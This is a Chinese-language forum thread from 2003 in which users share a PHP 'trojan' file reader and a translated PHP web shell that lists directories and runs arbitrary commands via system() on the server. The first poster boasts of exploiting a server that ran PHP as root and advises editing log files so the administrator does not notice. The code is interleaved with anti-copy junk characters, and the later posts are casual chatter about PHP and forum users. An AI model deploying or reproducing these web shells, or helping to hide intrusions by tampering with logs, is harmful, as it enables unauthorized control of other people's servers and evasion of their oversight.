我写的一个PHP的简单木马

ASEE

重在实用，HoHo,某天发现某个LINUX服务器居然使用root权限执行PHP，真是让我心动不已，浏览器就是我的SHELL，因为有root权限，因此我就%￥##··*，当然不要忘了修改日志文件，HoHo,不然管理员会告你。 xx.php如下（太简陋了，不免高手门笑话，hoho） " S1 ]3 s2 z; a0 ^9 h( I//获得指定文件的文本 function getfile($filename) 9 }& v* Y5 \0 M+ r+ {0 [ h{ + w& ^# b4 @ Q3 n if (!$filename){ : X9 {5 ?8 I2 M( H% s* F return false; } $fp = @fopen($filename,"r"); , ?+ _; r1 r, f) B5 _/ D$ h3 X . g% c' Q, @% X8 }, b P- B. ? if (!$fp){ 5 b# R) ~! t2 B8 @3 E return false; & C$ Y7 e; s% y" w: L } 9 m! a1 ]1 W, k2 F8 W $fdata = @fread($fp,filesize($filename)); fclose($fp); ; H0 u& G9 D; V/ G return $fdata; p$ @9 X" k* ?& @) o6 P} 6 p; g9 H/ t8 c& q' Y$ ^) T6 a& ?; k" r % h3 _$ \6 `" q4 n$ Z+ P1 B$str="

yzhlinux

ACEE 的程序用来得到文件在好不过，工厂虽小，但是还用了摸板替换的思想，可贵！ . f) ?+ a- f! Y但是在得到指定文件之前必须先看看服务器上都有些什么，想在服务器上执行命令，ACEE 的命令执行功能不够，这里我给大家这个专业的 shell。 ( K9 ^" }3 c% s" F/* GNU */ /* 您可以任意传播，不过请一定写出作者名字 */ /* + W5 `1 q) M3 m原作者： Martin Geisler 改写汉化： YZHLINUX 7 L8 {) ]" p1 p*/ 4 z6 Q ~5 H" H 3 ?$ {7 c1 A( T# d8 c' I9 ~) [/ a. e$ \! Z: j( `7 i6 C$ b/ P( `; `/* 首先检查 $work_dir 是否被设置了值,这是我们的工作目录 */ / `4 e% l+ ~5 `if (isset($work_dir)) { ' b+ O0 d6 S" J0 n" K /* 说明已经设置了 工作目录 ,那么我们就吧当前目录改变倒这个地方 */ , u/ K" g' |7 Y+ V9 C chdir($work_dir); E! H4 ]- V; C/ X9 b $work_dir = exec("pwd"); // pwd 是 Unix 中显示当前目录的命令,这里我们执行它.得到当前目录 } else { /* 如果没有设置 工作目录,那么我们就到 apache 的工作目录 注: $DOCUMENT_ROOT 是系统提供的*/ chdir($DOCUMENT_ROOT); $work_dir = $DOCUMENT_ROOT; / o; N5 L* d/ |- I, F} ?>

当前工作目录: 5 o) Y( b. q" y0 v9 C8 C: q, M7 F0 P' [4 x# T2 G) A# l; v $work_dir_splitted = explode("/", substr($work_dir, 1)); echo "Root/"; if ($work_dir_splitted[0] == "") { 7 b5 s( \5 X5 \* z. Z/ [. N $work_dir = "/"; /* 根目录. */ } else { for ($i = 0; $i < count($work_dir_splitted); $i++) { /* echo "i = $i";*/ 0 w' }9 x4 k6 w/ @8 |" T $url .= "/".$work_dir_splitted[$i]; echo "$work_dir_splitted[$i]/"; } } 0 |. {9 E; T' d9 V* S?>

选择新的工作目录:

2 l, t. }* n6 p" v /* 现在我们对这个目录坐一个文件列表 */ ' m$ u. W# [2 J" }+ ?( v& f$dir_handle = opendir($work_dir); : n) Y7 Q. L. y o( @4 r/* 来一个遍历找出所有的文件和目录 */ while ($dir = readdir($dir_handle)) { " l+ [1 E+ _4 v# Z4 Y# r0 ~ if (is_dir($dir)) { 0 ~8 `' m+ O7 P; ~6 j( U if ($dir == ".") { echo "Current Directory\n"; 2 r. ^8 i/ i/ U$ w) B' K2 D } elseif ($dir == "..") { /* 我们找到了父目录,我们要注意里看看父目录是不是根目录 (/) */ , f+ w8 C6 Y5 n! b9 {5 s" a+ [6 D" H if (strlen($work_dir) == 1) { /* 长度只有 1 ---- 那么只能是 '/' 了 */ & ~1 \4 K+ U0 ]; \/ E, _ } elseif (strrpos($work_dir, "/") == 0) { /* 发现第一个字符是 / 说明我到了顶层的目录了比如: /bin 或者 /home etc... */ 3 K! {: d( K S0 W( c$ I echo "Parent Directory\n"; } else { 0 t a( H3 r* w. W! }- I echo "Parent Directory\n"; } ' H! f# }! l+ A+ w7 A/ e } else { if ($work_dir == "/") { ' y) K; H) n! {( y; C0 w- Y echo "$dir\n"; # h4 I2 j! M( L. u } else { ! n ?/ P S8 o! }* e echo "$dir\n"; } 4 }, `2 L; H7 }+ M. q, p& A6 X } } & C5 R5 R! ^* D, u# B. u0 {. S} closedir($dir_handle);//不要忘记关闭 ?>

命令:

8 S4 _# e: i2 a W >

是否捕获错误信息?

Output:

<span style="display:none">' [3 P$ ^1 Z# n! U3 H0 Y3 r</span><?php <span style="display:none"># x% v' Z& g1 A Q+ P* J% O</span>if ($command) {<font class="jammer">0 @# S9 |4 y" f1 B</font> if ($stderr) { <span style="display:none">: b; ~( Z4 z# V8 j$ f. T</span> /* 这个命令组能看懂吗? <font class="jammer">* X; O. I0 j1 \9 k* A</font> 短短的一句语句但是做的事情有: 执行命令,把输出的结果保存到 output.txt ,显示 output.txt ,然后删除它!*/<font class="jammer"># d# _* ]0 S$ Q3 e! P</font> system($command . " 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/output.txt"); <span style="display:none">) c' C8 e6 C+ s/ E5 U9 U" f</span> }else { <span style="display:none">9 q7 H" W* V( q! V5 k: Z5 p</span> system($command);<font class="jammer">6 d1 K3 N3 t# B5 u [" R6 m</font> } <span style="display:none">4 Q- V/ K: |4 J</span>}<font class="jammer">: U" Q# s* X4 v; K</font> ?><font class="jammer">" H% J+ N% ^0 S5 \8 |</font>

. d& F: f/ D+ _3 |4 x) p " G( W: e# ?9 K9 P, d ) @3 L4 h. ?/ G/ r0 J5 C- o0 I

[此贴子已经被作者于2003-8-6 15:48:22编辑过]

ASEE

不错，不错。

猴子很忙

能力有限，看不懂。。

晕晕了，第二篇就不看了，第一篇好像见到过了

ASEE

我写的代码还算简洁，噢，HOHO。。。那里见过也不奇怪，需要的时候就自己写。抄一百行代码还不如自己写一行，PHP只能处理字符，处理网叶，干不成大事，说白了，PHP还不如UNIX的各种SHELL。

yzhlinux

PHP 也是可以做Unix 的一个shell的。
6 l/ O  I5 W: \5 k语法就是php的语法，只要把编译好的cgi模式的解析程序执行，就是一个shell外壳了

ASEE

是啊，我都有这个想法啊，php 的 VC 源代码我看了很久了，我觉得可以把它改动成我们所设想的东西，嵌入到我们的其他程序中去做控制脚本。HoHo,功能强大哦！
; H# B: w! k( h+ @% F不过不知道版权会被我们侵犯到什么地步 ：（
9 m- c3 U* h& a) y7 `' A" ]. \( G
+ Z7 A2 @: [: ^: Q. f6 T, E

yzhlinux  ASEE，你们都是工程的吗？计算机系吗？程序方面很强哦。
我是工程的，但不是计算机系的。

yzhlinux

这你也看的出来？
& X; x, Y; [( V% `0 Q我们既不是工程的也不是计算机系的

哦，这里的工程比较多啊，所以猜的，那你们什么学校的啊？

yzhlinux

我们都工作了你看不出来吗？

呵呵，没看出来，都是哪儿的，搞程序的？

yzhlinux

提供真人实姓，就不叫BBS了，那我注册了帐号还有什么意思？ ：）

又没让你说姓名，我想了解一下这里的高手有多少是学生啊

ASEE

以下是引用ASEE在2003-8-12 23:12:00的发言：
% h7 s8 A& a+ S9 M是啊，我都有这个想法啊，php 的 VC 源代码我看了很久了，我觉得可以把它改动成我们所设想的东西，嵌入到我们的其他程序中去做控制脚本。HoHo,功能强大哦！
6 f' X( B; R2 W6 }2 k 不过不知道版权会被我们侵犯到什么地步 ：（

* Q6 P2 y$ b% Z3 [9 e我有种发梦的感觉，是不是我眼花了，昨晚太累打字打错了，竟然写出这样的话来，我死也不信，如果有人攻击BBS，那就另当别论，或者帮主看不过去，那有另当别论。

yzhlinux

哪里啊，那是我要回复你的，结果却按错了，点成了编辑 ：（。
想恢复都不行了！ 你说的是什么我现在都忘记了！郁闷！

ASEE

看来这个BB让人郁闷，不过还算快。要不真象上CSDN一样，半天都进不去，干脆不去了，XML做的看来也不过如此，WEB SERVICE也不过如此，.NET也不过如此。

yzhlinux

这里人不多啊，自然快，CSDN 是快的，主要人太多，同时再线的比这里多500倍以上，半夜2:00以后你试试，那时没人，狂快！

yzhlounx 你是工程的吧  呵呵